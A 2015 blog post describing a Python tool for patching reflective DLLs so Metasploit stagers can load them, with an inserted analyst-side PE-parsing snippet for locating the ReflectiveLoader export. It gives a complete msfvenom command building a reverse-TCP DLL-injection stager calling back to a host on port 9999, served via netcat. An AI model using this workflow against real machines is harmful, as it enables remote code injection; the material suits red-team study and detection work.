Monday, May 11, 2015

reflectPatcher.py: python script to patch your reflective DLL

Here I share a tiny Python script to “patch” a reflective DLL with the bootstrap it needs to be executed by the respective stager. Usage is simple: give it the DLL you want to patch and the preferred exit method (thread by default).

I did this because I needed a faster way to patch DLLs instead of letting the msf handler do it for me. This way I don’t even have to call msfconsole.

 

The script looks for the ReflectiveLoader export function, calculates its raw offset and finally builds the stub. The reflective DLL is then built from the stub and the rest of the payload.

The script will also add the size of the payload (look at the bytes highlighted in the previous image) at the beginning of the reflective DLL, which some stagers need in order to know how many bytes to allocate for the next stage. Generally, the stager calls VirtualAlloc to reserve that memory. Note that those bytes should be removed if you are using an HTTP-based stager.
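
The two properties described above (a ReflectiveLoader export located by raw offset, and a 4-byte size in front of the DLL) are also what an analyst can check when triaging a captured stage. The following is an added example, not code from reflectPatcher.py: the function names are hypothetical and the sample is a constructed, non-functional PE skeleton.

```python
import struct

def strip_length_prefix(buf):
    """Drop a leading 4-byte little-endian length if it matches the remaining size."""
    if len(buf) > 4 and struct.unpack_from("<I", buf)[0] == len(buf) - 4:
        return buf[4:]
    return buf

def find_reflective_export(buf, needle=b"ReflectiveLoader"):
    """Return (export name, raw file offset) for a matching export, else None."""
    try:
        pe = struct.unpack_from("<I", buf, 0x3C)[0]            # e_lfanew
        if buf[:2] != b"MZ" or buf[pe:pe + 4] != b"PE\0\0":
            return None
        nsec, optsz = struct.unpack_from("<H12xH", buf, pe + 6)
        opt = pe + 24                                          # optional header
        pe32 = struct.unpack_from("<H", buf, opt)[0] == 0x10B  # else PE32+
        exp_rva, = struct.unpack_from("<I", buf, opt + (96 if pe32 else 112))
        if exp_rva == 0:
            return None
        secs = [struct.unpack_from("<8x4I", buf, opt + optsz + 40 * i) for i in range(nsec)]
        def off(rva):  # RVA -> raw file offset via the section table
            for vsize, va, rsize, rptr in secs:
                if va <= rva < va + max(vsize, rsize):
                    return rva - va + rptr
            raise ValueError("RVA outside every section")
        nnames, funcs, names, ords = struct.unpack_from("<4I", buf, off(exp_rva) + 24)
        for i in range(min(nnames, 4096)):  # cap guards against hostile counts
            o = off(struct.unpack_from("<I", buf, off(names) + 4 * i)[0])
            name = buf[o:buf.index(b"\0", o)]
            if needle in name:
                ordinal, = struct.unpack_from("<H", buf, off(ords) + 2 * i)
                rva, = struct.unpack_from("<I", buf, off(funcs) + 4 * ordinal)
                return name.decode("ascii", "replace"), off(rva)
    except (struct.error, ValueError):  # truncated or malformed image
        return None

def build_sample():
    """Constructed, non-functional PE32 skeleton: headers and an export table only."""
    b = bytearray(0x400)
    b[0:2] = b"MZ"
    struct.pack_into("<I4sHH12xHH", b, 0x3C, 0x40, b"PE\0\0", 0x14C, 1, 0xE0, 0x2102)
    struct.pack_into("<H94xII", b, 0x58, 0x10B, 0x1000, 0x60)  # magic, export directory
    struct.pack_into("<8s4I", b, 0x138, b".text", 0x200, 0x1000, 0x200, 0x200)
    struct.pack_into("<7I", b, 0x214, 1, 1, 0x1028, 0x102C, 0x1030, 0x1100, 0x1040)
    b[0x240:0x254] = b"_ReflectiveLoader@4\0"
    return bytes(b)
```

Matching on the export name is a heuristic: a renamed export will not be found, so treat a miss as inconclusive rather than clean.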



Let’s check it. I have compiled a silly reflective DLL to prompt a messagebox.


Next, I have created a dllinject/reverse_tcp stager as follows: 

root@kali:/tmp# msfvenom -p windows/dllinject/reverse_tcp lhost=192.168.1.41 lport=9999 dll=. -f exe -o /media/sf_Share/reflective_tcp.exe
No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Saved as: /media/sf_Share/reflective_tcp.exe
 

Finally, I patch the payload with the tiny bootstrap shellcode and wait for the stager to pick it up on port 9999 (a simple netcat will do):




